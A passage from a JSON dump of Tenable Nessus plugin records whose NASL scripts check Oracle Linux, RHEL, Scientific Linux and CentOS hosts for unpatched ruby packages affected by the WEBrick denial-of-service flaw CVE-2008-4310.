script_cve_id(\"CVE-2008-3656\", \"CVE-2008-4310\");\n script_bugtraq_id(30644);\n script_xref(name:\"RHSA\", value:\"2008:0981\");\n\n script_name(english:\"Oracle Linux 4 / 5 : ruby (ELSA-2008-0981)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0981 :\n\nUpdated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-December/000822.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-December/000823.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"irb-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-devel-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-docs-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-libs-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-mode-1.8.1-7.0.1.el4_7.2\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-tcltk-1.8.1-7.0.1.el4_7.2\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-devel-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-libs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:06:21", "description": "Updated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.", "edition": 26, "published": "2008-12-05T00:00:00", "title": "RHEL 4 / 5 : ruby (RHSA-2008:0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2008-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:irb", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:ruby", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:ruby-rdoc", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:ruby-docs", "p-cpe:/a:redhat:enterprise_linux:ruby-ri", "p-cpe:/a:redhat:enterprise_linux:ruby-mode", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk"], "id": "REDHAT-RHSA-2008-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/35038", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0981. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35038);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3656\", \"CVE-2008-4310\");\n script_bugtraq_id(30644);\n script_xref(name:\"RHSA\", value:\"2008:0981\");\n\n script_name(english:\"RHEL 4 / 5 : ruby (RHSA-2008:0981)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-4310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0981\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0981\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"irb-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-devel-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-docs-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-libs-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-mode-1.8.1-7.el4_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-devel-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-libs-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:44:04", "description": "Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : ruby on SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20081204_RUBY_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60502);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3656\", \"CVE-2008-4310\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0812&L=scientific-linux-errata&T=0&P=423\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c45de4e9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"irb-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-devel-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-docs-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-libs-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-mode-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.2\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-devel-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-libs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:25:28", "description": "Updated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.", "edition": 25, "published": "2008-12-26T00:00:00", "title": "CentOS 4 / 5 : ruby (CESA-2008:0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2008-12-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ruby-tcltk", "p-cpe:/a:centos:centos:ruby", "p-cpe:/a:centos:centos:ruby-rdoc", "p-cpe:/a:centos:centos:ruby-libs", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:ruby-mode", "p-cpe:/a:centos:centos:ruby-docs", "p-cpe:/a:centos:centos:ruby-devel", "p-cpe:/a:centos:centos:irb", "p-cpe:/a:centos:centos:ruby-ri", "p-cpe:/a:centos:centos:ruby-irb", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2008-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/35263", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0981 and \n# CentOS Errata and Security Advisory 2008:0981 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35263);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3656\", \"CVE-2008-4310\");\n script_bugtraq_id(30644);\n script_xref(name:\"RHSA\", value:\"2008:0981\");\n\n script_name(english:\"CentOS 4 / 5 : ruby (CESA-2008:0981)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain\na correct patch that resolves this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-December/015465.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4bd6fdf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-December/015473.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0d57ad0\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-December/015474.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?41933173\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-December/015514.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?91279855\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-December/015515.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27a84009\"\n );\n 